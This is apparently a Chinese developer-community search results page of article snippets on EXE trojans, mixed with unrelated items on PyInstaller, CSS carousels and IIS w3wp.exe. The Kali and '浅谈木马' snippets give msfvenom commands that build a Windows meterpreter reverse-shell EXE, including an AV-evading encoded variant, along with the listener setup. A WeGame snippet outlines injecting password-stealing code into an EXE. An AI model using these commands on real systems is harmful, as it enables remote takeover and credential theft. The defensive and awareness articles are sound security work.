首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏2024年网络安全宣传周

    网络安全宣传周 - EXE 文件携带木马

    然而,一些不法分子利用用户对娱乐的需求,将木马程序隐藏在看似正常的小游戏 EXE 文件中,给用户的电脑安全带来了严重威胁。 二、EXE 文件携带木马的隐藏方式(一)代码混淆通过对木马代码进行混淆处理,使其难以被常规的安全检测工具识别和分析。(二)加壳技术使用加壳工具对木马程序进行封装,改变其特征码,逃避杀毒软件的查杀。 三、木马植入机制(一)自动运行在 EXE 文件被执行时,木马程序自动启动并尝试获取系统的管理员权限。(二)修改系统设置更改注册表、系统服务等设置,确保木马在系统启动时能够自动加载。 (二)物联网风险随着物联网设备的普及,EXE 文件携带的木马可能会扩展到智能设备领域,带来新的安全挑战。 (三)社交工程利用攻击者可能会更加巧妙地利用社交工程手段,诱使用户下载和运行携带木马EXE 文件。十、结论EXE 文件携带木马是一种严重的网络安全威胁,给个人和社会带来了巨大的风险和损失。

    61210编辑于 2024-08-17
  • aipy实战:建设PE文件查杀神器,阻止Windows EXE木马

    一、 核心功能(1)扫恶意字符串(如 keylogger、powershell)(2)查熵值异常(判断是否加密 / 加壳)(3)揪可疑 API 组合(像注册表篡改、网络通信链)(4)解析 PE 头(看编译环境 、系统兼容性、加壳痕迹)二、过程实战测了个可疑文件,刚用工具跑了 nimplant.exe,结果吓一跳:提示词:帮我写一个小型的木马静态特征查杀工具,用于检测windows下的exe可执行文件是否是可疑的木马 扫描文件静态字符串,查看是否有明显的恶意特征检查程序熵值是否异常 3. 最后,测试我的exe程序:"D:\Tools\aipy20250411\aipy\nimplant.exe"。检测这个文件是不是恶意的木马。把写好的软件保存在项目文件夹下。 三、优势轻量:Python 脚本直接跑,不挑环境✨灵活:特征库可自定义,适合二次开发实用:样本初筛、应急响应都能用这次打造的PE文件查杀工具初战告捷,成功识别出恶意木马的多种特征,堪称静态分析的“小钢炮

    30310编辑于 2025-05-23
  • 来自专栏数据挖掘

    Python3 打包exe

    cx_Freeze(不推荐) 以前只用 cx_Freeze 支持将 python3 打包成 exe ,示例如下: 在你要打包的 python 文件下新建这个 setup.py 文件: #! ="TTyb", version="1.0", description="打包示例", executables=executables ) 然后在当前命令行执行: python3 PyInstaller(推荐) 后面 PyInstaller 开始支持 python3 打包,这样子打包就方便很多了,直接在当前命令行下: #命令语法:pyinstaller -F 文件名(带后缀py) #常用参数说明: #–icon=图标路径 #-F 打包成一个exe文件 #-w 使用窗口,无控制台 #-c 使用控制台,无窗口 #-D 创建一个目录,里面包含exe以及其他一些依赖性文件 #pyinstaller invite_code=3qlzjs99fq4gg

    1.4K30发布于 2019-07-01
  • 来自专栏生如夏花绚烂

    css3旋转木马效果

    margin: 150px auto; position: relative; transform-style: preserve-3d transform: rotateY(60deg) translateZ(300px); } section div:nth-child(3)

    1.9K10编辑于 2022-09-08
  • 来自专栏python3

    w3wp.exe报错

    IIS就不能用了     错误1:     错误应用程序   w3wp.exe,版本   6.0.3790.1830,错误模块   ntdll.dll,版本   5.2.3790.1830,错误地址 错误2:     Faulting   application   w3wp.exe,   version   6.0.3790.1830,   stamp   42435be1,   faulting 错误3:     .NET   Runtime   version   2.0.50727.42   -   执行引擎错误(7A05E2B3)   (80131506)     错误4:  

    70710发布于 2020-01-07
  • 来自专栏python3

    关于w3wp.exe

    Q : W3WP.EXE,应用程序,应用程序池之间的关系 A : 一个应用程序池可以包含多个应用程序,一个应用程序池创建一个W3WP.EXE进程.那么我们就不能简单的说一个进程池对应一个W3WP.EXE 其实是多个应用进程池对应一个W3WP.EXE进程的. Q : 如何启动和关闭W3WP.EXE这个进程 A : W3WP.EXE这个进程将在你访问www应用程序的时候启动.有人就会这么问了:"我启动了一个Web应用程序,发现系统自动创建了一个W3wp.exe A : W3WP.EXE这个进程的默认生命是1740分钟,但依然是在这种默认的自然规律下,W3WP.EXE将在自己失业20分钟后,被系统直接枪杀.这样就可以看出,要想让W3WP.EXE长时间的生存,那我们可以通过 Q : w3wp.exe在进程中存在的原因 A : IIS 6.0版本中的w3wp.exe进程是会根据INTER信息的开放与否而决定是否存在,只要IIS提供WEB服务,该进程会始终存在,无论是否支持asp

    2.1K21发布于 2020-01-06
  • kali使用msf生成exe木马常用最简一条龙命令

    multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST192.168.186.46setLPORT4444exploit✅第一步:生成木马程序 展开代码语言:BashAI代码解释msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.186.46LPORT=4444-fexe-oiarc.exe 载荷LHOST=192.168.186.46攻击者的IP(即你Kali或监听机器的IP)LPORT=4444攻击者监听的端口(反向连接目标会连回这个端口)-fexe输出格式为Windows可执行文件(.exe )-oiarc.exe输出文件名为iarc.exe总结:这条命令会生成一个Windows木马程序iarc.exe,一旦在目标Windows机器上运行,它会主动连接回192.168.186.46:4444 ✅第五步:设置监听IP和端口展开代码语言:BashAI代码解释setLHOST192.168.186.46setLPORT4444这两行必须和生成木马时用的LHOST和LPORT完全一致,否则无法建立连接

    1.5K20编辑于 2025-11-14
  • 来自专栏IT大咖说

    咋多了一个svchost.exe进程?小心!你可能中了Bazar后门木马

    据美国科技媒体BleepingComputer报道,一场新的网络钓鱼活动正在试图借助一种名为“BazarBackdoor”的新型后门木马来获取目标企业网络的完全访问权限。 图3.“新型冠状病毒”主题诱饵文档 ? 图4.“客户投诉”主题诱饵文档 尽管下载的文件采用了Word、Excel或PDF的图标,但实际上它们全是可执行文件。 例如,“新型冠状病毒”主题诱饵文档对应的文件名为“PreviewReport.DOC.exe”,“客户投诉”主题诱饵文档对应的文件名为“Preview.PDF.exe”。 图6.C2通信 但是,第二个C2请求将下载XOR加密的有效载荷,即BazarBackdoor后门木马。 ? 图8.将后门注入svchost.exe 由于Windows任务管理中时刻都运行着大量的svchost.exe进程,因此大多数用户都不太可能会注意到什么时候多出了一个这样的进程,进而也就不会注意到后门的存在

    3K20发布于 2020-05-19
  • 来自专栏E条咸鱼

    基于Python3木马连接工具编写

    类似前言一样的废话 上一次的文章中是分析了 Windows系统上 中国菜刀的工作原理,于是突发奇想,便想着用Python3也写一个和菜刀功能一样的程序出来,其实可变的地方还是挺少的,考虑的点只有4个而已 内容中,尤其是正则匹配部分尤其辣眼睛,所以有意见可以提出来,然后我忽略掉就好了 环境搭建 为了方便测试,所以我是在本地的虚拟机搭建一个 apache+php的环境然后在其根目录下放置一个 php一句话木马 开始乱写 首先我们要确定我们连接上木马文件,所需要什么东西 文件url 木马参数 没有这两个就无法建立连接,所以开头的时候先把他安排上 url=str(input("木马url: ")) parameter url地址)parameter(木马参数)和无关紧要的header(http头部) ? for i in range(len(result)-3): print (result[i]+" ",end="") 命令执行的部分就到这里了,那么现在解决目录切换的问题 在上面的执行结果中

    1.6K30发布于 2020-08-17
  • 来自专栏全栈程序员必看

    trojangeneric木马_kali木马绑定app

    Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。

    2K40编辑于 2022-11-08
  • 来自专栏用户10781703的专栏

    浅谈木马

    Windows木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe -e 编码的方式 -i 编码次数 -b不使用十六进制00 一些其他的编码方式,可以使用msfvenom -l encoders命令查看 四、木马防护 1.木马的传播途径 (1 )利用下载进行传播 (2)利用系统漏洞传播 (3)利用邮件传播 (4)利用即使通信传播 (5)利用网页传播 (6)利用蠕虫病毒传播等 2.木马的防范与查杀 (1)首先安装杀毒软件 (2)不执行奇怪的软件 ,使用的软件尽量从官方下载安装 (3)不随便打开奇怪的邮件 (4)尽量少使用或者不使用共享文件夹 (5)不点击奇怪的链接等 本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识,后期会有对木马的深入探讨

    1.6K20编辑于 2023-10-10
  • 来自专栏Eric杂货铺

    pyinstaller.exe带logo打包exe

    可以在Windows、Mac OS X和Linux上使用,但是并不是跨平台的,而是说你要是希望打包成.exe文件,需要在Windows系统上运行PyInstaller进行打包工作;打包成mac app,

    1.9K30发布于 2020-09-24
  • 来自专栏大熊G的前端分享

    利用css3写一个旋转木马

    源代码如下 这里主要是使用css动画属性和3d旋转 <! /h5css3/image/780.jfif" alt="">

  • <img src="..

1K30编辑于 2022-11-14
  • SpringBoot3+JDK17打包成加密EXE

    最近有一个springweb项目,需要放到客户端,但是又不想让一些人破解反编译jar包,于是我将项目打包成加密exe,让一些人无法简单破解。本文就是介绍详细的配置步骤。 ><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w<em>3</em>.org/2001/XMLSchema-instance"xsi VC桌面环境自行到官网下载 vs_BuildTools.exe 。 graalvm-ce-java17-windows-amd64-22.3.3.zip四. idea构建在开始菜单找到x64 Native Tools Command Prompt for VS 2022,然后启动:找到idea.exe

    32910编辑于 2025-12-01
  • 来自专栏网优小兵玩Python

    Python 3 代码打包可执行文件EXE

    我们写好的代码.py源文件,打包成EXE可执行文件,这样即使在没有安装Python的电脑上也可以执行。使用pyinstaller,参数如下(该命令直接在CMD命令提示符中运行): ? 表示去掉控制台窗口,这在GUI界面时非常有用(用于windows系统) -p 表示你自己自定义需要加载的类路径,一般情况下用不到 -i 表示可执行文件的图标 -c 使用控制台,无窗口 -D 创建一个目录,里面包含exe 将源代码文件改成英文再次尝试 pyinstaller -F -i d:\Python_tool\09扩容脚本\kr.ico d:\Python_tool\09扩容脚本\Ce.py 打包EXE可执行文件成功

    1.5K00发布于 2019-10-10
  • 来自专栏Unity3d程序开发

    unity3d:windows读写excel,打包exe可用

    版本是多少,去对应的安装目录中取dll 2.System.Data.dll 在D:\Program Files\Unity2017.2\Editor\Data\Mono\lib\mono\2.0 3. ].Value = "ID"; worksheet.Cells[1, 2].Value = "Product"; worksheet.Cells[1, 3] worksheet.Cells["C2"].Value = 37; worksheet.Cells["D2"].Value = 3.99; worksheet.Cells["A3" ].Value = 12002; worksheet.Cells["B3"].Value = "Hammer"; worksheet.Cells["C3" ].Value = 5; worksheet.Cells["D3"].Value = 12.10; worksheet.Cells["A4"].Value

    69120编辑于 2023-08-24
  • 来自专栏FreeBuf

    Kronos银行木马被发现,疑似新版Osiris木马

    根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。 该样本被命名为os.exe,大概来自Osiris,巧合与否,目前没有得到证实。 ? *参考来源:bleepingcomputer,由抗生素1209编译,转载请注明来自FreeBuf.COM

    1.6K50发布于 2018-07-31
  • 来自专栏全栈程序员必看

    instsrv.exe srvany.exe启动服务

    所在文件夹</param> /// <param name="consulExeLocal">consul.exe,exe物理路径</param> private static void ConsulClientRegEdit Exception("注册表操作失败"); foreach (var item in list) { aimdir.SetValue(item.Item1, item.Item2, item.Item3) = null) root.DeleteSubKeyTree(subkey); } } 2.instsrv.exe srvany.exe启动服务 string consulExeLocal = DefautToolsRelyHelper.Consul + "\\consul.exe"; string srvanyPath = DefautToolsRelyHelper.Srvany + @"\srvany\srvany.exe"; string instsrvPath = DefautToolsRelyHelper.Srvany + @"\srvany\instsrv.exe"; CheckRelyTools(consulExeLocal, srvanyPath,

    1.1K20编辑于 2022-09-01
  • 来自专栏白安全组

    挖矿木马详解

    门罗币是一种匿名币,安全性更高; 3. 门罗币的算法通过计算机CPU和GPU即可进行运算,不需要其他特定的硬件支持; 4. 互联网上开源的门罗币挖矿项目很多,方便使用; 5. 暗网支持门罗币交易。 定位挖矿 普通开源挖矿程序 如果感觉主机突然出现明显的卡顿,可以打开任务管理器,查看CPU使用率,中了挖矿木马时,用任务管理器可能会看到存在奇怪的进程,CPU占用率较高,比如下图中,LogonUI.exe ,ProtectionX挖矿木马就是其中一种,除了自保护和自启动外,还会释放安装驱动文件,木马运行流程如图: 母体运行后会将自身设置为隐藏属性,并释放win1logon.exe、wuauc1t.exe 由于目前的杀毒软件都不会清理数据库中的内容,如发现主机感染Mykings木马,应及时联系专业的安全人员进行排查和处置。 加固与防护 安全软件 1. 安装杀毒软件; 2. 及时更新病毒库; 3. 定期对系统进行漏洞扫描,及时修复漏洞,特别是挖矿木马常用的“永恒之蓝”漏洞; 2. Web服务器要及时更新组件,安装软件补丁; 3. 对于数据库要及时更新数据库管理软件补丁。

    13.5K61发布于 2019-12-02
  • 来自专栏黑客技术家园

    木马盗号《一》

    这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。 由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。 其次隐蔽性较好,他是直接在目标关键EXE注入代码,可以理解为病毒代码就是EXE的一部分。不需要另外加载DLL或者开启服务,那样目标比较大。 现在已经选好了方式:把病毒代码写入到目标EXE,然后每次运行目标EXE就会运行我们的恶意代码。下面介绍我们应该通过怎么样方式去捕获WeGame的账号和密码。 难道要让本菜IDA逆向分析整个关键EXE文件找漏洞,显然不太适合我-。-,一方面技术不行,另一方面没那么多时间。。。。那么怎么破解这个密码框捕获到的密码不对的问题呢?

    1.9K30发布于 2021-04-02
  • 领券